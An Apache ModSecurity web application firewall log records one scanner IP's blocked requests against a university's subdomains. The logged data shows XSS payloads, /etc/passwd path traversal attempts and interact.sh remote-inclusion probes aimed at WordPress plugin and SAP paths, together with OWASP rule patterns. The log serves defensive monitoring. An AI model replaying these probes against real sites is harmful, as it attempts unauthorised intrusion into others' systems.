[Tue Aug 29 11:54:21.603067 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApYpoQAAAAa"]
[Tue Aug 29 11:54:21.656877 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAAp0OEAAAAAI"]
[Tue Aug 29 11:54:22.617308 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-sCo-f0AAApbUTMAAAAh"]
[Tue Aug 29 11:54:22.871121 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApl9@IAAAAo"]
[Tue Aug 29 11:54:22.895032 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApmXuAAAAAp"]
[Tue Aug 29 11:54:22.897600 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAph8vEAAAAj"]
[Tue Aug 29 11:54:22.904305 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApk-U8AAAAn"]
[Tue Aug 29 11:54:23.012820 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-8Co-f0AAApmXuEAAAAp"]
[Tue Aug 29 11:54:23.552302 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApV210AAAAJ"]
[Tue Aug 29 11:54:23.554307 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAoGFlwAAAAE"]
[Tue Aug 29 11:54:23.555010 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAnHQxQAAAAT"]
[Tue Aug 29 11:54:23.573323 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApl9@UAAAAo"]
[Tue Aug 29 11:54:23.592227 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApbUTcAAAAh"]
[Tue Aug 29 11:54:23.727913 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-8Co-f0AAApjINIAAAAm"]
[Tue Aug 29 11:54:25.155917 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAqRzA4AAAAM"]
[Tue Aug 29 11:54:25.156084 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAqSwgoAAAAN"]
[Tue Aug 29 11:54:25.193254 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApXgdMAAAAU"]
[Tue Aug 29 11:54:25.235193 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApl9@8AAAAo"]
[Tue Aug 29 11:54:25.255563 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAApXgdUAAAAU"]
[Tue Aug 29 11:54:25.279300 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO16AcCo-f0AAAor7vQAAAAk"]
[Tue Aug 29 11:54:26.156902 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AsCo-f0AAAqSwhIAAAAN"]
[Tue Aug 29 11:54:26.852762 2023] [:error] [pid 2709] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqVbzYAAAAi"]
[Tue Aug 29 11:54:26.869819 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqTvi0AAAAa"]
[Tue Aug 29 11:54:26.872426 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAph8wgAAAAj"]
[Tue Aug 29 11:54:26.987899 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16AsCo-f0AAAqUB1IAAAAb"]
[Tue Aug 29 11:54:26.991749 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16AsCo-f0AAAoGFl8AAAAE"]
[Tue Aug 29 11:54:27.035071 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqTvi8AAAAa"]
[Tue Aug 29 11:54:27.052311 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAoGFmEAAAAE"]
[Tue Aug 29 11:54:27.055122 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAor7wAAAAAk"]
[Tue Aug 29 11:54:27.107286 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAoGFmIAAAAE"]
